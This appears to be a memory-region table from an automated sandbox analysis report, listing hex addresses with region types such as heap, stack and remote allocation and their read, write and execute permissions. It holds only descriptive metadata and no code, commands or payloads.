heap
page read and write
4C78000
heap
page read and write
17734A25000
heap
page read and write
177349D6000
heap
page read and write
17736914000
heap
page read and write
20679000
direct allocation
page execute and read and write
17734A43000
heap
page read and write
8B90000
trusted library allocation
page read and write
640000
heap
page read and write
7F0000
unkown
page read and write
82E000
unkown
page readonly
17734988000
heap
page read and write
5E30000
trusted library allocation
page read and write
24B27C52000
trusted library allocation
page read and write
7FFD9B633000
trusted library allocation
page execute and read and write
620000
unkown
page readonly
78E4000
heap
page read and write
990000
unkown
page read and write
200D0000
remote allocation
page read and write
2010E000
stack
page read and write
3471000
heap
page read and write
2002D000
stack
page read and write
17736992000
heap
page read and write
2CDC000
stack
page read and write
17736946000
heap
page read and write
68FE000
stack
page read and write
3E83000
unkown
page execute and read and write
4CFF000
heap
page read and write
4CA6000
heap
page read and write
3154000
heap
page read and write
762E000
stack
page read and write
743D000
stack
page read and write
17736992000
heap
page read and write
17736992000
heap
page read and write
260000
unkown
page readonly
801000
unkown
page readonly
CC103B7000
stack
page read and write
CC105BE000
stack
page read and write
24B25D45000
heap
page read and write
2370000
unkown
page readonly
24B27CC5000
trusted library allocation
page read and write
3F0000
unkown
page readonly
8AD0000
trusted library allocation
page read and write
2006E000
stack
page read and write
24B24210000
heap
page read and write
177349D6000
heap
page read and write
17736992000
heap
page read and write
610000
unkown
page readonly
810000
heap
page read and write
2B90000
direct allocation
page read and write
AD0000
unkown
page readonly
4AC0000
trusted library allocation
page read and write
8D0000
heap
page read and write
7D0000
unkown
page readonly
17736911000
heap
page read and write
87A0000
trusted library allocation
page read and write
7FFD9B8C0000
trusted library allocation
page read and write
17734960000
heap
page read and write
79EE000
stack
page read and write
3471000
heap
page read and write
4C20000
heap
page read and write
22CC3000
unclassified section
page execute and read and write
17734A1C000
heap
page read and write
A50000
heap
page read and write
203A4000
heap
page read and write
24B3619A000
trusted library allocation
page read and write
1773695D000
heap
page read and write
2460000
unkown
page execute and read and write
24B2632E000
trusted library allocation
page read and write
24B24250000
heap
page read and write
3DC000
stack
page read and write
7FFD9B830000
trusted library allocation
page read and write
814000
heap
page read and write
2DA000
stack
page read and write
CC1053E000
stack
page read and write
781000
unkown
page readonly
7FFD9B970000
trusted library allocation
page read and write
30D9000
heap
page read and write
CC0FD7E000
stack
page read and write
24B242C6000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
86F5000
trusted library allocation
page read and write
810000
unkown
page read and write
7880000
heap
page read and write
713E000
stack
page read and write
7FFD9B7EA000
trusted library allocation
page read and write
4CA6000
heap
page read and write
17734A2F000
heap
page read and write
30098FE000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
17734A21000
heap
page read and write
17736992000
heap
page read and write
856D000
stack
page read and write
177349F4000
heap
page read and write
4C20000
trusted library allocation
page read and write
24B24610000
trusted library allocation
page read and write
82E000
unkown
page readonly
7FFD9B8A0000
trusted library allocation
page read and write
4AF0000
system
page execute and read and write
17734A28000
heap
page read and write
4CB9000
heap
page read and write
4B00000
trusted library allocation
page read and write
8500000
trusted library allocation
page execute and read and write
2550000
unkown
page readonly
4C1C000
stack
page read and write
7A0000
unkown
page read and write
24B25D5D000
heap
page read and write
85D0000
trusted library allocation
page execute and read and write
4CA0000
heap
page read and write
4DC1000
trusted library allocation
page read and write
93D1000
direct allocation
page execute and read and write
790000
heap
page read and write
177349E6000
heap
page read and write
4CBC000
heap
page read and write
3471000
heap
page read and write
38FD000
direct allocation
page execute and read and write
3298000
heap
page read and write
201AB000
stack
page read and write
7B6B000
stack
page read and write
3284000
heap
page read and write
3471000
heap
page read and write
7AB0000
trusted library allocation
page read and write
4B80000
direct allocation
page read and write
24B35EB1000
trusted library allocation
page read and write
24B24280000
heap
page read and write
24B3E3C0000
heap
page read and write
3279000
heap
page read and write
2B90000
direct allocation
page read and write
4CBC000
heap
page read and write
733E000
stack
page read and write
3471000
heap
page read and write
610000
unkown
page readonly
3B20000
trusted library allocation
page read and write
CC101FE000
stack
page read and write
37D0000
direct allocation
page execute and read and write
24B242D5000
heap
page read and write
860000
unkown
page read and write
201F1000
heap
page read and write
4CF9000
heap
page read and write
4CBC000
heap
page read and write
8640000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
24B263AD000
trusted library allocation
page read and write
7FFD9B817000
trusted library allocation
page read and write
82E000
unkown
page readonly
328A000
heap
page read and write
4BC0000
direct allocation
page read and write
7490000
heap
page read and write
950000
direct allocation
page read and write
95E000
unkown
page read and write
24B245F0000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page read and write
3471000
heap
page read and write
17734B00000
heap
page read and write
17736A12000
heap
page read and write
7AA0000
trusted library allocation
page read and write
960000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
4BF0000
direct allocation
page read and write
348B000
heap
page read and write
610000
unkown
page readonly
A30000
heap
page read and write
8C10000
direct allocation
page read and write
76AE000
stack
page read and write
303F000
stack
page read and write
4BD0000
heap
page execute and read and write
4BA0000
direct allocation
page read and write
980000
unkown
page read and write
177349FE000
heap
page read and write
24B3E327000
heap
page read and write
7230000
heap
page execute and read and write
17736B2E000
heap
page read and write
24EF000
unkown
page read and write
24B25E70000
heap
page execute and read and write
7712000
heap
page read and write
7AC0000
trusted library allocation
page read and write
7848000
heap
page read and write
291C000
unkown
page read and write
24B27CC9000
trusted library allocation
page read and write
24B26AAA000
trusted library allocation
page read and write
327F000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
24B27C47000
trusted library allocation
page read and write
820000
unkown
page readonly
7FFD9B815000
trusted library allocation
page read and write
960000
heap
page read and write
4CBF000
heap
page read and write
9D0000
heap
page read and write
3250000
heap
page read and write
7FFD9B800000
trusted library allocation
page execute and read and write
4CB9000
heap
page read and write
2D90000
heap
page read and write
C50000
unkown
page readonly
7FFD9B6E6000
trusted library allocation
page read and write
2B90000
direct allocation
page read and write
17736A14000
heap
page read and write
24B27C5A000
trusted library allocation
page read and write
77C000
stack
page read and write
24B27C6D000
trusted library allocation
page read and write
7819000
heap
page read and write
374A000
heap
page read and write
17734A15000
heap
page read and write
3B12000
direct allocation
page execute and read and write
4B4E000
stack
page read and write
B50000
system
page execute and read and write
2370000
unkown
page readonly
3471000
heap
page read and write
4CFC000
heap
page read and write
2544000
heap
page read and write
1773691F000
heap
page read and write
17736992000
heap
page read and write
88D0000
heap
page read and write
CC1043E000
stack
page read and write
7FFD9B920000
trusted library allocation
page read and write
9F0000
unkown
page read and write
7FFD9B870000
trusted library allocation
page read and write
7A2E000
stack
page read and write
17734A67000
heap
page read and write
24B24625000
heap
page read and write
3154000
heap
page read and write
821000
unkown
page execute read
3284000
heap
page read and write
17736943000
heap
page read and write
3460000
trusted library section
page read and write
17734980000
heap
page read and write
5283000
unkown
page execute and read and write
9300000
direct allocation
page execute and read and write
3282000
heap
page read and write
4BC0000
trusted library allocation
page execute and read and write
24B3E4C0000
heap
page read and write
8520000
trusted library allocation
page read and write
1FF9E000
stack
page read and write
1FDDE000
stack
page read and write
17734A15000
heap
page read and write
73BE000
stack
page read and write
A58000
heap
page read and write
177349EE000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
2D95000
heap
page read and write
236C3000
unclassified section
page execute and read and write
4F1000
unkown
page read and write
32AE000
stack
page read and write
7A70000
trusted library allocation
page read and write
BC3000
system
page execute and read and write
2DA000
stack
page read and write
250000
unkown
page readonly
17736992000
heap
page read and write
76EF000
stack
page read and write
177349E6000
heap
page read and write
720000
unkown
page read and write
8830000
heap
page read and write
7860000
heap
page read and write
35C0000
heap
page read and write
3170000
heap
page read and write
4CA0000
heap
page read and write
73FB000
stack
page read and write
3471000
heap
page read and write
2DEE000
stack
page read and write
24B27CDD000
trusted library allocation
page read and write
17736910000
heap
page read and write
3471000
heap
page read and write
8620000
trusted library allocation
page read and write
E60000
unkown
page readonly
17734A77000
heap
page read and write
2540000
heap
page read and write
17734A4C000
heap
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
17736992000
heap
page read and write
3471000
heap
page read and write
821000
unkown
page execute read
20550000
direct allocation
page execute and read and write
4AE0000
heap
page read and write
835000
unkown
page read and write
5DE9000
trusted library allocation
page read and write
177349AC000
heap
page read and write
38F9000
direct allocation
page execute and read and write
4AC9000
trusted library allocation
page read and write
24B27C56000
trusted library allocation
page read and write
8D0000
heap
page read and write
7F970000
trusted library allocation
page execute and read and write
4C00000
direct allocation
page read and write
3471000
heap
page read and write
3471000
heap
page read and write
177349AD000
heap
page read and write
866E000
trusted library allocation
page read and write
24B268D7000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
3570000
heap
page read and write
4C9E000
stack
page read and write
79AE000
stack
page read and write
8BC0000
direct allocation
page read and write
24B241E0000
heap
page read and write
252E000
stack
page read and write
72D0000
direct allocation
page read and write
78DD000
heap
page read and write
17734B05000
heap
page read and write
3412000
unkown
page execute and read and write
218C3000
unclassified section
page execute and read and write
3154000
heap
page read and write
24B3E57F000
heap
page read and write
3570000
trusted library allocation
page read and write
2540000
heap
page read and write
24B263B2000
trusted library allocation
page read and write
206EE000
direct allocation
page execute and read and write
78F6000
heap
page read and write
2544000
heap
page read and write
717F000
stack
page read and write
9C0000
unkown
page readonly
7FFD9B900000
trusted library allocation
page read and write
24B25C50000
trusted library allocation
page read and write
4D5E000
stack
page read and write
17736EF0000
heap
page read and write
7910000
heap
page execute and read and write
A7D1000
direct allocation
page execute and read and write
7FFD9B840000
trusted library allocation
page read and write
17736DD0000
heap
page read and write
4B90000
direct allocation
page read and write
781000
unkown
page readonly
3471000
heap
page read and write
68BD000
stack
page read and write
201F9000
heap
page read and write
810000
unkown
page read and write
17736992000
heap
page read and write
4C40000
heap
page read and write
7FFD9B6EC000
trusted library allocation
page execute and read and write
8B8C000
stack
page read and write
8B4E000
stack
page read and write
177349F1000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7480000
heap
page read and write
4CFF000
heap
page read and write
24B3E3E4000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page execute and read and write
200D0000
remote allocation
page read and write
32A2000
heap
page read and write
4B70000
direct allocation
page read and write
17734A25000
heap
page read and write
17734A43000
heap
page read and write
24B35ED1000
trusted library allocation
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
33AE000
unkown
page read and write
7875000
heap
page read and write
7A90000
trusted library allocation
page read and write
3471000
heap
page read and write
4AD0000
direct allocation
page read and write
3E3C000
unclassified section
page read and write
24B242E6000
heap
page read and write
30095FE000
stack
page read and write
17736992000
heap
page read and write
950000
direct allocation
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
CC102F9000
stack
page read and write
24B3E700000
heap
page read and write
17736913000
heap
page read and write
38D1000
remote allocation
page execute and read and write
7A80000
trusted library allocation
page read and write
1FF1E000
stack
page read and write
4AE2000
trusted library allocation
page read and write
396E000
direct allocation
page execute and read and write
5E27000
trusted library allocation
page read and write
77C000
stack
page read and write
4883000
unkown
page execute and read and write
24B3E3E0000
heap
page read and write
7928000
trusted library allocation
page read and write
17736800000
heap
page read and write
17734A19000
heap
page read and write
3B20000
trusted library allocation
page read and write
24B3E2FE000
heap
page read and write
882B000
stack
page read and write
177349F4000
heap
page read and write
208A0000
unclassified section
page execute and read and write
3150000
heap
page read and write
1773693B000
heap
page read and write
4CFA000
heap
page read and write
4CB9000
heap
page read and write
24B25C80000
trusted library allocation
page read and write
24B3E282000
heap
page read and write
4CDE000
stack
page read and write
2BE0000
direct allocation
page read and write
4E4C000
stack
page read and write
FE0000
unkown
page readonly
177349EC000
heap
page read and write
3F0000
unkown
page readonly
2DA0000
heap
page read and write
2081D000
direct allocation
page execute and read and write
4AE5000
heap
page read and write
8C30000
trusted library allocation
page execute and read and write
2B70000
heap
page read and write
24B274E8000
trusted library allocation
page read and write
52E4000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page execute and read and write
17734A4E000
heap
page read and write
177349FD000
heap
page read and write
24B260D8000
trusted library allocation
page read and write
270000
unkown
page readonly
24B26337000
trusted library allocation
page read and write
A50000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
4CF9000
heap
page read and write
891A000
heap
page read and write
177349E6000
heap
page read and write
1773692E000
heap
page read and write
3440000
heap
page read and write
17734A12000
heap
page read and write
17734A43000
heap
page read and write
17736923000
heap
page read and write
72B0000
direct allocation
page read and write
7FFD9B630000
trusted library allocation
page read and write
CC106BF000
stack
page read and write
291C000
unkown
page read and write
4AB0000
trusted library allocation
page read and write
720000
unkown
page read and write
17736917000
heap
page read and write
821000
unkown
page execute read
20821000
direct allocation
page execute and read and write
212A0000
unclassified section
page execute and read and write
307C000
stack
page read and write
24B2635B000
trusted library allocation
page read and write
3471000
heap
page read and write
965000
heap
page read and write
24B26ADA000
trusted library allocation
page read and write
835000
unkown
page read and write
3471000
heap
page read and write
7FFD9B812000
trusted library allocation
page read and write
8AF0000
trusted library allocation
page execute and read and write
7FFD9B890000
trusted library allocation
page read and write
3471000
heap
page read and write
3095000
heap
page read and write
3DC000
stack
page read and write
766E000
stack
page read and write
37BF000
heap
page read and write
C1A000
system
page execute and read and write
4CBF000
heap
page read and write
1773692D000
heap
page read and write
8D8000
heap
page read and write
1773691D000
heap
page read and write
7D0000
unkown
page readonly
8F3000
heap
page read and write
24B24310000
heap
page read and write
7E0000
heap
page read and write
630000
unkown
page readonly
CC1017E000
stack
page read and write
346F000
stack
page read and write
3473000
heap
page read and write
CC1073B000
stack
page read and write
2031C000
heap
page read and write
4AA0000
trusted library allocation
page read and write
4C59000
heap
page read and write
630000
unkown
page readonly
CC1118E000
stack
page read and write
177349E9000
heap
page read and write
17736B2B000
heap
page read and write
4BD0000
direct allocation
page read and write
1FFDF000
stack
page read and write
17736992000
heap
page read and write
CC104B8000
stack
page read and write
800000
unkown
page readonly
24B35EC0000
trusted library allocation
page read and write
7FFD9B64B000
trusted library allocation
page read and write
30D5000
heap
page read and write
1773691E000
heap
page read and write
30094FF000
stack
page read and write
3471000
heap
page read and write
17734A0E000
heap
page read and write
7AF0000
trusted library allocation
page read and write
17736992000
heap
page read and write
640000
heap
page read and write
8907000
heap
page read and write
4CBF000
heap
page read and write
2E60000
unkown
page execute and read and write
2DF0000
heap
page read and write
24B266E2000
trusted library allocation
page read and write
2550000
unkown
page readonly
7FFD9B930000
trusted library allocation
page read and write
1FE9C000
stack
page read and write
7A0000
unkown
page read and write
8600000
trusted library allocation
page read and write
4C9E000
heap
page read and write
1FE5E000
stack
page read and write
3471000
heap
page read and write
7FFD9B632000
trusted library allocation
page read and write
4D1F000
stack
page read and write
8D8000
heap
page read and write
610000
unkown
page readonly
CC1130B000
stack
page read and write
7E0000
heap
page read and write
3470000
heap
page read and write
24B25C40000
heap
page readonly
CC0FDFF000
stack
page read and write
7920000
trusted library allocation
page read and write
17736912000
heap
page read and write
2D18000
stack
page read and write
720D000
stack
page read and write
8BE0000
direct allocation
page read and write
7290000
direct allocation
page read and write
814000
heap
page read and write
17736992000
heap
page read and write
17736420000
heap
page read and write
374E000
heap
page read and write
24B3E4FA000
heap
page read and write
17736992000
heap
page read and write
7B0000
unkown
page readonly
9C0000
unkown
page readonly
24B24315000
heap
page read and write
30BB000
stack
page read and write
17736952000
heap
page read and write
30090FE000
stack
page read and write
72E0000
direct allocation
page read and write
8630000
trusted library allocation
page read and write
B9E000
system
page execute and read and write
17736936000
heap
page read and write
177349AE000
heap
page read and write
7F0000
unkown
page read and write
24B2634A000
trusted library allocation
page read and write
835000
unkown
page read and write
30E2000
heap
page read and write
24B26AE8000
trusted library allocation
page read and write
747B000
stack
page read and write
4CFC000
heap
page read and write
24B3E3B7000
heap
page execute and read and write
837000
unkown
page readonly
3720000
trusted library allocation
page execute and read and write
24B27C34000
trusted library allocation
page read and write
177349B0000
heap
page read and write
CC1110E000
stack
page read and write
800000
unkown
page readonly
837000
unkown
page readonly
8B00000
trusted library allocation
page read and write
7C0000
unkown
page readonly
24B26370000
trusted library allocation
page read and write
250000
unkown
page readonly
30099FB000
stack
page read and write
7950000
trusted library allocation
page read and write
24B3E248000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
600000
unkown
page readonly
72F0000
direct allocation
page read and write
727B000
stack
page read and write
CC1007E000
stack
page read and write
30093FF000
stack
page read and write
17736CC1000
heap
page read and write
1FEDE000
stack
page read and write
84F7000
stack
page read and write
860000
unkown
page read and write
85AF000
stack
page read and write
7235000
heap
page execute and read and write
4C50000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page execute and read and write
7FFD9B910000
trusted library allocation
page read and write
17734A43000
heap
page read and write
CC100FD000
stack
page read and write
3471000
heap
page read and write
1773694B000
heap
page read and write
3284000
heap
page read and write
30E0000
system
page execute and read and write
4DB0000
heap
page read and write
17736917000
heap
page read and write
3284000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
7FFD9B63D000
trusted library allocation
page execute and read and write
3154000
heap
page read and write
3471000
heap
page read and write
4B90000
heap
page readonly
4D05000
heap
page read and write
17734A15000
heap
page read and write
3621000
heap
page read and write
820000
unkown
page readonly
3471000
heap
page read and write
3483000
unkown
page execute and read and write
820000
unkown
page readonly
4ABD000
trusted library allocation
page execute and read and write
7FFD9B940000
trusted library allocation
page read and write
2ED1000
remote allocation
page execute and read and write
7940000
trusted library allocation
page execute and read and write
7B0000
unkown
page readonly
7B00000
trusted library allocation
page read and write
4F19000
trusted library allocation
page read and write
1773691D000
heap
page read and write
4CB9000
heap
page read and write
17736933000
heap
page read and write
E61000
unkown
page readonly
A58000
heap
page read and write
810000
heap
page read and write
30FA000
heap
page read and write
888E000
stack
page read and write
42D1000
remote allocation
page execute and read and write
33EE000
unkown
page read and write
CC0FCF3000
stack
page read and write
67A000
stack
page read and write
3471000
heap
page read and write
4AE7000
heap
page read and write
82E000
unkown
page readonly
9F0000
unkown
page read and write
30092FF000
stack
page read and write
820000
unkown
page readonly
4AB3000
trusted library allocation
page execute and read and write
7FFD9B7E1000
trusted library allocation
page read and write
24B25D40000
heap
page read and write
17734A43000
heap
page read and write
4CB9000
heap
page read and write
3471000
heap
page read and write
17736992000
heap
page read and write
177349AA000
heap
page read and write
8BB0000
direct allocation
page read and write
24B25EA0000
heap
page execute and read and write
801000
unkown
page readonly
5C83000
unkown
page execute and read and write
24B26AE2000
trusted library allocation
page read and write
78F2000
heap
page read and write
7C0000
unkown
page readonly
24B2657B000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
24B361A9000
trusted library allocation
page read and write
7FFD9B634000
trusted library allocation
page read and write
306D000
heap
page read and write
17734860000
heap
page read and write
17736912000
heap
page read and write
328A000
heap
page read and write
88CC000
stack
page read and write
24B25F36000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
30A1000
heap
page read and write
CC1063E000
stack
page read and write
2642000
unkown
page read and write
730000
heap
page read and write
17736919000
heap
page read and write
3008FFE000
stack
page read and write
3AA1000
direct allocation
page execute and read and write
790000
heap
page read and write
1FE1F000
stack
page read and write
20892000
direct allocation
page execute and read and write
3596000
heap
page read and write
4AE5000
trusted library allocation
page execute and read and write
24B242D1000
heap
page read and write
67A000
stack
page read and write
327B000
heap
page read and write
204CD000
heap
page read and write
24B24620000
heap
page read and write
201F0000
heap
page read and write
7DF3FEBA0000
trusted library allocation
page execute and read and write
1773691A000
heap
page read and write
7B20000
trusted library allocation
page read and write
4E24000
trusted library allocation
page read and write
260000
unkown
page readonly
270000
unkown
page readonly
85E0000
heap
page read and write
4AB4000
trusted library allocation
page read and write
17734A1D000
heap
page read and write
7930000
trusted library allocation
page read and write
CC1033E000
stack
page read and write
24B27C4A000
trusted library allocation
page read and write
342E000
stack
page read and write
201EC000
stack
page read and write
17734A2B000
heap
page read and write
4CBF000
heap
page read and write
24B3E55E000
heap
page read and write
A6F000
heap
page read and write
4CF9000
heap
page read and write
2642000
unkown
page read and write
892A000
heap
page read and write
72C0000
direct allocation
page read and write
CC1128A000
stack
page read and write
7FFD9B640000
trusted library allocation
page read and write
4CBD000
heap
page read and write
17734A00000
heap
page read and write
4ADA000
trusted library allocation
page execute and read and write
3008EFA000
stack
page read and write
620000
unkown
page readonly
177349AB000
heap
page read and write
17736915000
heap
page read and write
4D9E000
stack
page read and write
17734A03000
heap
page read and write
3279000
heap
page read and write
24B27DE6000
trusted library allocation
page read and write
4C8C000
heap
page read and write
837000
unkown
page readonly
3B62000
unclassified section
page read and write
24B242CD000
heap
page read and write
1773694F000
heap
page read and write
240C3000
unclassified section
page execute and read and write
177349D6000
heap
page read and write
17736928000
heap
page read and write
24B3E576000
heap
page read and write
8660000
trusted library allocation
page read and write
7810000
heap
page read and write
2067D000
direct allocation
page execute and read and write
3471000
heap
page read and write
7B10000
trusted library allocation
page read and write
177349FE000
heap
page read and write
7FFD9B716000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B860000
trusted library allocation
page read and write
821000
unkown
page execute read
3471000
heap
page read and write
2BF0000
direct allocation
page read and write
4BB0000
direct allocation
page read and write
200D0000
remote allocation
page read and write
3471000
heap
page read and write
35D0000
trusted library allocation
page read and write
87EC000
stack
page read and write
8916000
heap
page read and write
4AE0000
trusted library allocation
page read and write
8AE0000
trusted library allocation
page read and write
24B27C30000
trusted library allocation
page read and write
4224000
unclassified section
page read and write
There are 788 hidden memdumps, click here to show them.